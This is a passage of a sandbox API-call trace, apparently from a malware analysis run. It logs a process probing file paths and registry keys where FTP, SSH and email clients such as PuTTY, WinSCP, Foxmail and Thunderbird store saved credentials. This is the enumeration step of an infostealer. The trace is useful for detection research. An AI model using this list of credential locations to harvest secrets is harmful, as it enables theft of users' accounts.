dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.117] GetProcessHeap () returned 0x740000 [0250.117] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x75b6c0 [0250.118] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.119] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\BitKinex\\bitkinex.ds", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 58 [0250.119] GetProcessHeap () returned 0x740000 [0250.119] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x78) returned 0x757598 [0250.119] GetProcessHeap () returned 0x740000 [0250.119] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.121] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 0 [0250.121] GetProcessHeap () returned 0x740000 [0250.121] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757598 | out: hHeap=0x740000) returned 1 [0250.121] GetProcessHeap () returned 0x740000 [0250.121] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6a) returned 0x75b6c0 [0250.122] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.123] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\UltraFXP\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 56 [0250.123] GetProcessHeap () returned 0x740000 [0250.123] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x74) returned 0x757998 [0250.123] GetProcessHeap () returned 0x740000 [0250.124] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.126] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.127] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 0 [0250.127] GetProcessHeap () returned 0x740000 [0250.128] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757998 | out: hHeap=0x740000) returned 1 [0250.128] GetProcessHeap () returned 0x740000 [0250.128] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f68) returned 0x75b6c0 [0250.242] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.243] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\FTP Now\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 55 [0250.243] GetProcessHeap () returned 0x740000 [0250.243] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x72) returned 0x757298 [0250.243] GetProcessHeap () returned 0x740000 [0250.244] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.245] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 0 [0250.245] GetProcessHeap () returned 0x740000 [0250.246] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757298 | out: hHeap=0x740000) returned 1 [0250.246] GetProcessHeap () returned 0x740000 [0250.246] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75b6c0 [0250.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.247] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\VanDyke\\SecureFX", pszValue="Config Path", pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fba8*=0x104 | out: pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fba8*=0x104) returned 0x2 [0250.247] GetProcessHeap () returned 0x740000 [0250.247] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.247] GetProcessHeap () returned 0x740000 [0250.247] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0250.248] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0250.249] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0250.249] GetProcessHeap () returned 0x740000 [0250.249] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b6c0 [0250.250] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.251] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Odin Secure FTP Expert\\QFDefault.QFQ", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 59 [0250.251] GetProcessHeap () returned 0x740000 [0250.251] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75a7c8 [0250.251] GetProcessHeap () returned 0x740000 [0250.251] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.253] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 0 [0250.253] GetProcessHeap () returned 0x740000 [0250.253] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0250.253] GetProcessHeap () returned 0x740000 [0250.254] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.254] GetProcessHeap () returned 0x740000 [0250.254] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0250.255] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0250.256] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0250.256] GetProcessHeap () returned 0x740000 [0250.256] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8c) returned 0x75b6c0 [0250.257] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.258] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Odin Secure FTP Expert\\SiteInfo.QFP", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 58 [0250.259] GetProcessHeap () returned 0x740000 [0250.259] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x78) returned 0x756d98 [0250.259] GetProcessHeap () returned 0x740000 [0250.259] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.261] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 0 [0250.261] GetProcessHeap () returned 0x740000 [0250.261] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756d98 | out: hHeap=0x740000) returned 1 [0250.261] GetProcessHeap () returned 0x740000 [0250.262] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.262] GetProcessHeap () returned 0x740000 [0250.262] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75b6c0 [0250.262] GetProcessHeap () returned 0x740000 [0250.262] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b860 [0250.262] GetProcessHeap () returned 0x740000 [0250.262] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b590 [0250.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.263] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x75b590 | out: phkResult=0x75b590*=0x0) returned 0x2 [0250.264] GetProcessHeap () returned 0x740000 [0250.264] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b590 | out: hHeap=0x740000) returned 1 [0250.264] GetProcessHeap () returned 0x740000 [0250.264] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5d0 [0250.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.390] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x75b5d0 | out: phkResult=0x75b5d0*=0x0) returned 0x2 [0250.390] GetProcessHeap () returned 0x740000 [0250.390] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5d0 | out: hHeap=0x740000) returned 1 [0250.390] GetProcessHeap () returned 0x740000 [0250.391] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.391] GetProcessHeap () returned 0x740000 [0250.391] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b860 | out: hHeap=0x740000) returned 1 [0250.391] GetProcessHeap () returned 0x740000 [0250.391] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75b6c0 [0250.391] GetProcessHeap () returned 0x740000 [0250.391] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b920 [0250.391] GetProcessHeap () returned 0x740000 [0250.391] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b680 [0250.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.393] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x75b680 | out: phkResult=0x75b680*=0x0) returned 0x2 [0250.393] GetProcessHeap () returned 0x740000 [0250.393] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b680 | out: hHeap=0x740000) returned 1 [0250.393] GetProcessHeap () returned 0x740000 [0250.393] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b650 [0250.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.394] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x75b650 | out: phkResult=0x75b650*=0x0) returned 0x2 [0250.394] GetProcessHeap () returned 0x740000 [0250.394] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b650 | out: hHeap=0x740000) returned 1 [0250.394] GetProcessHeap () returned 0x740000 [0250.395] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.395] GetProcessHeap () returned 0x740000 [0250.395] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b920 | out: hHeap=0x740000) returned 1 [0250.395] GetProcessHeap () returned 0x740000 [0250.395] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75b6c0 [0250.395] GetProcessHeap () returned 0x740000 [0250.395] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74ba40 [0250.395] GetProcessHeap () returned 0x740000 [0250.395] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0250.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.397] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x75b640 | out: phkResult=0x75b640*=0x0) returned 0x2 [0250.397] GetProcessHeap () returned 0x740000 [0250.397] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0250.397] GetProcessHeap () returned 0x740000 [0250.397] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6a0 [0250.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.398] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x75b6a0 | out: phkResult=0x75b6a0*=0x0) returned 0x2 [0250.398] GetProcessHeap () returned 0x740000 [0250.398] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6a0 | out: hHeap=0x740000) returned 1 [0250.398] GetProcessHeap () returned 0x740000 [0250.398] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b670 [0250.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.400] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x75b670 | out: phkResult=0x75b670*=0x0) returned 0x2 [0250.400] GetProcessHeap () returned 0x740000 [0250.400] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b670 | out: hHeap=0x740000) returned 1 [0250.400] GetProcessHeap () returned 0x740000 [0250.400] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b620 [0250.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.401] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x75b620 | out: phkResult=0x75b620*=0x0) returned 0x2 [0250.402] GetProcessHeap () returned 0x740000 [0250.402] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b620 | out: hHeap=0x740000) returned 1 [0250.402] GetProcessHeap () returned 0x740000 [0250.402] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.402] GetProcessHeap () returned 0x740000 [0250.402] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ba40 | out: hHeap=0x740000) returned 1 [0250.402] GetProcessHeap () returned 0x740000 [0250.402] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75b6c0 [0250.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.404] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Thunderbird", pszValue="CurrentVersion", pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fba4*=0x104) returned 0x2 [0250.406] GetProcessHeap () returned 0x740000 [0250.406] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.406] GetProcessHeap () returned 0x740000 [0250.406] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x75b6c0 [0250.407] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.408] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Foxmail\\mail", arglist=0x19fbb8 | out: param_1="C:\\Program Files (x86)\\Foxmail\\mail") returned 35 [0250.408] GetProcessHeap () returned 0x740000 [0250.408] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4a) returned 0x75a488 [0250.408] GetProcessHeap () returned 0x740000 [0250.409] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.410] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Foxmail\\mail") returned 0 [0250.410] GetProcessHeap () returned 0x740000 [0250.411] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.411] GetProcessHeap () returned 0x740000 [0250.411] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0250.411] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x75a488, nSize=0x104 | out: lpDst="C:") returned 0x3 [0250.412] Sleep (dwMilliseconds=0xa) [0250.533] GetProcessHeap () returned 0x740000 [0250.533] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75b6c0 [0250.534] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.535] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\%s", arglist=0x19f938 | out: param_1="C:\\Foxmail*") returned 11 [0250.535] GetProcessHeap () returned 0x740000 [0250.535] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1a) returned 0x75a6c0 [0250.535] GetProcessHeap () returned 0x740000 [0250.535] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.536] FindFirstFileW (in: lpFileName="C:\\Foxmail*", lpFindFileData=0x19f94c | out: lpFindFileData=0x19f94c*(dwFileAttributes=0x560055, ftCreationTime.dwLowDateTime=0x580057, ftCreationTime.dwHighDateTime=0x5a0059, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x620061, ftLastWriteTime.dwLowDateTime=0x640063, ftLastWriteTime.dwHighDateTime=0x660065, nFileSizeHigh=0x680067, nFileSizeLow=0x6a0069, dwReserved0=0x6c006b, dwReserved1=0x6e006d, cFileName="opqr\x08", cAlternateFileName="ꒈuĄ")) returned 0xffffffff [0250.536] GetProcessHeap () returned 0x740000 [0250.536] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a6c0 | out: hHeap=0x740000) returned 1 [0250.537] GetProcessHeap () returned 0x740000 [0250.537] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.540] GetProcessHeap () returned 0x740000 [0250.540] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f70) returned 0x75b6c0 [0250.541] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.542] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 59 [0250.542] GetProcessHeap () returned 0x740000 [0250.542] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75a488 [0250.542] GetProcessHeap () returned 0x740000 [0250.542] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.543] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 0 [0250.543] GetProcessHeap () returned 0x740000 [0250.544] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.544] GetProcessHeap () returned 0x740000 [0250.544] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0250.545] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0250.545] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0250.545] GetProcessHeap () returned 0x740000 [0250.546] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f70) returned 0x75b6c0 [0250.546] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.547] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19fb50 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 53 [0250.547] GetProcessHeap () returned 0x740000 [0250.547] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6e) returned 0x75a7c8 [0250.547] GetProcessHeap () returned 0x740000 [0250.547] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.667] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 0 [0250.667] GetProcessHeap () returned 0x740000 [0250.668] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0250.668] GetProcessHeap () returned 0x740000 [0250.668] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.668] GetProcessHeap () returned 0x740000 [0250.668] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75b6c0 [0250.668] GetProcessHeap () returned 0x740000 [0250.668] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b920 [0250.668] GetProcessHeap () returned 0x740000 [0250.668] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b650 [0250.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.670] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x75b650 | out: phkResult=0x75b650*=0x0) returned 0x2 [0250.670] GetProcessHeap () returned 0x740000 [0250.670] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b650 | out: hHeap=0x740000) returned 1 [0250.670] GetProcessHeap () returned 0x740000 [0250.670] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b590 [0250.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.672] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x75b590 | out: phkResult=0x75b590*=0x0) returned 0x2 [0250.672] GetProcessHeap () returned 0x740000 [0250.672] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b590 | out: hHeap=0x740000) returned 1 [0250.672] GetProcessHeap () returned 0x740000 [0250.672] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.672] GetProcessHeap () returned 0x740000 [0250.672] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b920 | out: hHeap=0x740000) returned 1 [0250.672] GetProcessHeap () returned 0x740000 [0250.672] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x75b6c0 [0250.673] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.674] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\GmailNotifierPro\\ConfigData.xml", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 69 [0250.674] GetProcessHeap () returned 0x740000 [0250.674] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8e) returned 0x75a488 [0250.674] GetProcessHeap () returned 0x740000 [0250.674] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.675] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 0 [0250.676] GetProcessHeap () returned 0x740000 [0250.676] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.676] GetProcessHeap () returned 0x740000 [0250.676] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0250.677] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0250.677] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0250.678] GetProcessHeap () returned 0x740000 [0250.678] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6a) returned 0x75b6c0 [0250.678] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.679] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\DeskSoft\\CheckMail", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 56 [0250.679] GetProcessHeap () returned 0x740000 [0250.679] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x74) returned 0x757518 [0250.679] GetProcessHeap () returned 0x740000 [0250.680] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.681] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 0 [0250.681] GetProcessHeap () returned 0x740000 [0250.682] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.682] GetProcessHeap () returned 0x740000 [0250.682] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757518 | out: hHeap=0x740000) returned 1 [0250.682] GetProcessHeap () returned 0x740000 [0250.682] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0250.683] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0250.684] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0250.684] GetProcessHeap () returned 0x740000 [0250.684] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f7c) returned 0x75b6c0 [0250.685] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.685] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\WinFtp Client\\Favorites.dat", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 50 [0250.685] GetProcessHeap () returned 0x740000 [0250.686] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x68) returned 0x75a7c8 [0250.686] GetProcessHeap () returned 0x740000 [0250.686] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.687] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 0 [0250.688] GetProcessHeap () returned 0x740000 [0250.688] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0250.688] GetProcessHeap () returned 0x740000 [0250.688] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.688] GetProcessHeap () returned 0x740000 [0250.688] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75b6c0 [0250.688] GetProcessHeap () returned 0x740000 [0250.688] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b7d0 [0250.688] GetProcessHeap () returned 0x740000 [0250.688] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b580 [0250.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.690] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl", phkResult=0x75b580 | out: phkResult=0x75b580*=0x0) returned 0x2 [0250.690] GetProcessHeap () returned 0x740000 [0250.690] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b580 | out: hHeap=0x740000) returned 1 [0250.690] GetProcessHeap () returned 0x740000 [0250.690] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0250.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0250.799] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Martin Prikryl", phkResult=0x75b640 | out: phkResult=0x75b640*=0x0) returned 0x2 [0250.799] GetProcessHeap () returned 0x740000 [0250.799] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0250.799] GetProcessHeap () returned 0x740000 [0250.800] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.801] GetProcessHeap () returned 0x740000 [0250.801] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b7d0 | out: hHeap=0x740000) returned 1 [0250.801] 